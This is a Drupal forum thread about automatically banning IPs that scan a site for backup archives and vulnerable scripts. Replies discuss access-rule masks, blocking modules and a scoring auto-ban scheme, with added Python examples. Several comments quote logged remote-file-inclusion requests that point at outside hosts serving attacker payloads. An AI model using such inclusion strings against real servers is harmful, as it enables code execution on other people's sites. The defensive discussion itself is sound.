I have a lot of requests from different IPs in China asking for random files with a rar extension.
In the log I see page-not-found errors for mirserver.rar, www.rar, backup.rar, and so on. I don't have rars on my site, but I would like to automatically ban those IPs trying to get rars from my site, which are consuming my resources. Is there a way to do this? Thanks

Comments

hedac’s picture

new entry page not found: admin/Databackup/NewCloud_Backup.MDB
what is that? lol
it is clear I have tons of spy bots

hedac’s picture

bots are using many, many different IPs from Korea, China, USA... and they try to exploit some things... Drupal is secure and doesn't give them anything but a page not found... but I hate having them around... they eat bandwidth and memory...

new entries:

playlist.php/db.php?commonpath=http://6l0zt.com/technote7/data/group/id.txt??

common/db.php?commonpath=http://www.sec-ir.com/administrator/components/com_joomla-visites/core/m...????

hedac’s picture

new requests... searching for vulnerabilities I guess...

/content/errors.php?error=http://mixcom.ru/pic/main.jpg???

/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.geocities.com/bocah_ajaib20/id.txt%0D??

they are all different ip
not only one bot... hundreds of them... or one bot using a lot of proxies

hedac’s picture

how could we ban ip for some days automatically if it requests a page like errors.php... ?

hedac’s picture

keep having attacks.....
this is my current list of banned hosts


hedac’s picture

this one is very rare
from Hostname 208.99.199.20

misc/);G(7.V.18==
misc/)))1e(-d.2e,-d.2c);G(42
misc/,M),D.2a(a,
misc/,c);G(40)d.9Q(f,

and more like that...

of course... another ip to the block Deny list.

biblebill’s picture

Is there a character that would ban a range of IP addresses in the mask box [access rules] or somewhere else?
I would like to ban/deny the following range: 208.99.192.0 - 208.99.223.255

fwiw; for what it's worth dept;
http://tools.whois.net/index.php?fuseaction=whois.whoisbyipresults
http://news.cnet.com/Alleged-Seattle-Spammer-arrested/2100-7348_3-618775...

hedac’s picture

I don't think so. % is all, but not between 192 and 223.

wiredescape’s picture

I get this same spammer hammering away at my site...

You can block the IP range 208.99.192.0 - 208.99.223.255 in Home › Administer › User management › Access rules with:

Deny:
208.99.19_.%
208.99.220.%
208.99.221.%
208.99.222.%
208.99.223.%

Allow:
208.99.190.%
208.99.191.%
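A check worth running before trusting a hand-written mask set like the one above. This is an added example, not code from the thread or from Drupal: it models Drupal 6 access rules, whose host masks are SQL LIKE patterns (`%` any run of characters, `_` exactly one) and where a matching Allow rule overrides a matching Deny rule, and reports which addresses in the stated range the masks leave unblocked and which addresses just outside it they block.

```python
"""Verify Drupal 6 host masks against an intended IP range (added example)."""
import functools
import ipaddress
import re

# Masks as posted above; the range they are meant to cover is 208.99.192.0/19.
DENY = ["208.99.19_.%", "208.99.220.%", "208.99.221.%", "208.99.222.%", "208.99.223.%"]
ALLOW = ["208.99.190.%", "208.99.191.%"]
TARGET = ipaddress.ip_network("208.99.192.0/19")  # 208.99.192.0 - 208.99.223.255


@functools.lru_cache(maxsize=None)
def like_to_regex(mask: str) -> re.Pattern:
    """Translate a SQL LIKE mask into an anchored regular expression."""
    parts = []
    for ch in mask:
        if ch == "%":
            parts.append(".*")
        elif ch == "_":
            parts.append(".")
        else:
            parts.append(re.escape(ch))  # '.' and digits match literally
    return re.compile("^" + "".join(parts) + "$")


def is_denied(ip: str, deny=tuple(DENY), allow=tuple(ALLOW)) -> bool:
    """Blocked when some Deny mask matches and no Allow mask does (D6 semantics)."""
    if any(like_to_regex(m).match(ip) for m in allow):
        return False
    return any(like_to_regex(m).match(ip) for m in deny)


def coverage_errors(deny=tuple(DENY), allow=tuple(ALLOW), target=TARGET):
    """Return (addresses inside target left unblocked, addresses next to it blocked)."""
    wrongly_allowed = [str(ip) for ip in target if not is_denied(str(ip), deny, allow)]
    # The /24 blocks immediately below and above the target range.
    neighbours = [ipaddress.ip_network("208.99.191.0/24"),
                  ipaddress.ip_network("208.99.224.0/24")]
    wrongly_denied = [str(ip) for n in neighbours for ip in n
                      if is_denied(str(ip), deny, allow)]
    return wrongly_allowed, wrongly_denied


if __name__ == "__main__":
    missed, overblocked = coverage_errors()
    print(f"{len(missed)} addresses in range not blocked; first: {missed[:1]}")
    print(f"{len(overblocked)} neighbouring addresses wrongly blocked")
```

Running it shows that `208.99.19_.%` only reaches 208.99.199.255, so every address from 208.99.200.0 to 208.99.219.255 is still allowed; two extra Deny masks (`208.99.20_.%` and `208.99.21_.%`) close that hole.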

hedac’s picture

I would like to ask if there is a way to automatically BAN or add the IP to the Deny hosts list if they try to reach a specific page, for example "content/common/db.php"

frames’s picture

This one is tricky, both on what to consider "bannable" and on whether it is really worth it, in terms of processing time needed to identify these attacks and in terms of possible "false bans" (a www site is supposed to be a public place).

I can't mention a Drupal project for this.

At the webserver level, protecting against IPs used to "scan" a site sounds good. I can think of looking for IPs that appear many times in /var/logs. There is a risk of banning a legitimate spider, such as Google.

Similarly, you could look for a certain "phrase" in that file, no matter if it's repeated or not. This is what you asked for (the phrase would be the path you would want).

For starters, take a look at Banning Bad Bots: A Short But Effective Script (not a Drupal specific solution).

Hope that helps. Regards!

silverwing’s picture

http://drupal.org/project/badbehavior - not quite what the OP is asking about, but should help a bit.

~silverwing

hedac’s picture

thanks. very interesting... maybe it is what I'm looking for.

hedac’s picture

Thanks :)
I have searched for info on the IPs and none of them are Google or any good bot. All of them are in some unknown hosting providers or without info. And also, Googlebot should not request pages with all those suspicious parameters.
I think that rewrite solution is very good

frames’s picture

Just a further comment: When I said "There is a risk of banning a legitimate spider, such as Google.", I should have said "there is a risk of banning a legitimate IP, such as Google's or any other IP."

With public non-fixed IPs being used by these suckers, and if you use an automatic solution, you might be banning ANYONE on the Internet from seeing your site.

The impact of this can be negligible (20-100 users out of millions?), but that IP can be used by anyone on the net. It's just a balance between living with those extra requests handled by the server (and keeping everything patched, which is a must) or losing (even though it's just a bit) some of your visibility. You and I can afford losing those potential readers. The New York Times or a high-traffic site might not.

A different but related issue would be a DoS attack. Those are punctual in time, but another PITA!

trante’s picture

It would be helpful if IPs could automatically be banned after some hacking behaviour.

For example, if some visitor tries to connect to this URL
example.com/wp-login.php
it's possibly a hacker attack.

Most of the time I check logs manually and ban those IPs.
It would be helpful to ban them if they try to visit some admin content.

dshields’s picture

Agreed - this would be very helpful
Perhaps Honeypot Module should have some rules integration?

xaris.tsimpouris’s picture

So far, this is what I have created in a custom module, and it seems to work really nicely.
A custom page that is set to respond for 403 and 404 pages. There, I check what url is requested and for each "special" case I add points. For example, now, I check for /devel (for pages like /node/*/devel/token) and /node/add. For these two examples, I add 20 points for the first case, 10 for the second one, and one point for whatever other page gave "access denied". 20 because it is highly bot-related and 10 because it is a more classic "url" that somebody may accidentally go to. Anyway, for each url request I add points and save them in a local txt file, per ip. A) Didn't use the database to save the info, so as to avoid this kind of overhead, and B) didn't use the session, as bots don't seem to keep cookies.
After each request, if the threshold (I put 15) is reached then A) the IP is banned and B) if the user is logged in, it is deleted at once.
Finally, a cron that checks the txt files and restores IPs (unban) after two days (and deletes the equivalent txt files), so as to keep the database automatically cleaned up.

--
http://1024.gr - Programming by nature
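The scoring scheme described above, written out as an added example (not xaris.tsimpouris's module and not Drupal code): failed 403/404 requests earn an IP points by path (20 for `/devel`, 10 for `/node/add`, 1 for anything else), a total of 15 bans the IP, and a cron-style sweep lifts bans and drops scores after two days. It also covers frames's earlier suggestion of keying on a "phrase" in the request path. Assumptions: scores live in an in-memory dict rather than per-IP text files, the sample requests are constructed, and the deletion of a logged-in user is not modelled.

```python
"""Points-based auto-ban for failed requests (added example)."""
from datetime import datetime, timedelta

# Path fragment -> points. Any other 403/404 scores 1, as in the post.
WEIGHTS = {"/devel": 20, "/node/add": 10}
THRESHOLD = 15
EXPIRY = timedelta(days=2)


def score_for(path: str) -> int:
    """Points for one failed request; the highest-weighted matching rule wins."""
    return max((pts for frag, pts in WEIGHTS.items() if frag in path), default=1)


class Scoreboard:
    def __init__(self):
        self.points = {}   # ip -> (total points, last seen)
        self.banned = {}   # ip -> time of ban

    def record(self, ip: str, path: str, when: datetime) -> bool:
        """Score a 403/404 request; return True when this request triggers a ban."""
        if ip in self.banned:
            return False
        total, _ = self.points.get(ip, (0, when))
        total += score_for(path)
        self.points[ip] = (total, when)
        if total >= THRESHOLD:
            self.banned[ip] = when
            return True
        return False

    def expire(self, now: datetime) -> None:
        """Cron sweep: unban after EXPIRY and forget stale scores."""
        for ip, when in list(self.banned.items()):
            if now - when >= EXPIRY:
                del self.banned[ip]
                self.points.pop(ip, None)
        for ip, (_, seen) in list(self.points.items()):
            if now - seen >= EXPIRY:
                del self.points[ip]


# Constructed sample of failed requests (ip, path, time); not real log data.
SAMPLE = [
    ("203.0.113.7", "/node/12/devel/token", datetime(2024, 1, 1, 10, 0)),
    ("203.0.113.7", "/node/add", datetime(2024, 1, 1, 10, 0, 5)),
    ("198.51.100.9", "/sitemap.xml", datetime(2024, 1, 1, 10, 1)),
    ("198.51.100.9", "/node/add", datetime(2024, 1, 1, 10, 2)),
]


def run_sample():
    """Replay SAMPLE, then run the sweep two days later; returns (bans, still banned, tracked)."""
    board = Scoreboard()
    bans = [ip for ip, path, when in SAMPLE if board.record(ip, path, when)]
    board.expire(datetime(2024, 1, 3, 10, 0))
    return bans, sorted(board.banned), sorted(board.points)
```

Because the `/devel` weight already exceeds the threshold, one such request bans on the spot, while the second IP stays tracked at 11 points and would need a few more failed requests before it is banned.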

rvb’s picture

Hi xaris.tsimpouris
I like your idea a lot. Any chance you could share your module's code.
Thanks

jaypan’s picture

Nice idea! But note that creating text files will be much more overhead than using your database. You would be better off creating a DB based solution.

But this would be a good module idea.

Contact me to contract me for D7 -> D10/11 migrations.

selinav’s picture

Can you share your code, please?

Thanks in advance

brankoc’s picture

For Drupal 8, the Drupal Perimeter Defence module does exactly this:

https://www.drupal.org/project/perimeter

It seems to be a really simple module; whenever Drupal cannot resolve a requested path, it emits a NotFoundHttpException event. The module intercepts the event, compares the requested path against a list of forbidden requests and if it matches, asks Drupal to ban the IP using the core Ban module.

brankoc’s picture

I have made a D7 version of Perimeter, discussed here: https://www.drupal.org/project/perimeter/issues/3062229